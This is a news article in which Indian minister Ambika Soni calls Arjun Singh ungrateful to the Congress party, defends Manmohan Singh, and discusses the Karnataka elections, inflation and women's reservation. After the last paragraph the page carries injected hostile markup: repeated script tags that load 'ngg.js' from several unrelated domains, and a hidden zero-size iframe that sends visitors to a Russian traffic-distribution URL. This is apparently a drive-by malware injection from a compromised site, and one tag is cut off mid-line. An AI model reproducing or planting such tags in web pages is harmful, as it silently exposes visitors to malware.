New Delhi: Pointing her gun towards the Union Human Resource Development Minister Arjun Singh, the Union Minister for Tourism and Culture and a close advisor of the Congress president, Ambika Soni has said that the outspoken minister was “ungrateful towards the party”. Speaking exclusively to Headlines India on Tuesday, Soni criticised her Cabinet colleague saying that people like Arjun Singh have been paid-back sufficiently by the Congress party for their contributions.

“Arjun Singh has got so many benefits against his 40-years' service to the party. He always got rewarded with top positions in government and the party. Now, after getting so many perks, if a persons is raising questions on the functioning withing the party, then I will say it as ungrateful,” said Soni.

Soni also defended the decision making process in her party which, she claimed, is solely based on unanimity, wherein, every body's voice is heard. She downplayed the comments of the senior party leader by saying that he has clarified on everything regarding the internal functioning of the Congress.

Arjun Singh, in the a book written by journalist Kanhaiyalal Nandan on his 50-years long political career, was quoted making critical comments about the decision making process and loyalty in the Congress party. His comments, however later clarified by himself, did not go well within the party and the Congress veteran found himself isolated in the party.

Whether the Arjun Singh's effort was to weaken the position of Manmohan Singh, Ambika Soni put her weight behind the Prime Minister and said that there was no scope for the formation of different power centers within the party.

“The country has clocked 8-9 per cent GDP growth under his leadership. Now we have unprecedented pro-people programmes like NREGA, RTI and Bharat Nirman. So Congress thinks that Monmohan Singh is an able leader,” she said. However she was noncommittal on whether he would be the party's prime ministerial candidate in the next general elections.

She also looked assured on the prospects of her party in the ongoing Assembly elections in Karnataka and claimed that people of the state have been irritated by the flip-flop coalition of Bhartiya Janata Party and Janata Dal-Secular and want a stable government over there.

“People know that Congress has put Karnataka on the road of development and gave it a place on the world-map through the IT industry. They do realise that any interruption in the road of prosperity and development would harm them. So people are looking for a stable government in the state because we have assured them to provide it for their goods,” she claimed.

Though the Minister accepted that inflation would be an important issue in the elections, she cited the soring prices world over, especially of crude oil, as the reason behind the ever increasing inflation in the country. She, however, hoped that record procurements of wheat and rice would be able to pull down the prices of food grains.

On the issue of women reservation in the Parliament and Legislative assemblies, the minister said that there was enough scope for discussion over the matter and and people can put forward their apprehensions and suggestions in this regard with the Standing Committee of Parliament.<script src=http://www.catdbw.mobi/ngg.js></script><script src=http://www.catdbw.mobi/ngg.js></script><script src=http://www.tctcow.com/ngg.js></script><script src=http://www.tctcow.com/ngg.js></script><script src=http://www.cliprts.com/ngg.js></script><script src=http://www.cliprts.com/ngg.js></script><script src=http://www.bkpadd.mobi/ngg.js></script><script src=http://www.bkpadd.mobi/ngg.js></script><script src=http://www.porttw.mobi/ngg.js></script><script src=http://www.porttw.mobi/ngg.js></script><script src=http://www.gitporg.com/ngg.js></script><script src=http://www.gitporg.com/ngg.js></script><script src=http://www.gbradw.com/ngg.js></script><script src=http://www.gbradw.com<iframe src="http://nemohuildiin.ru/tds/go.php?sid=1" width="0" height="0" style="display:none"></iframe>
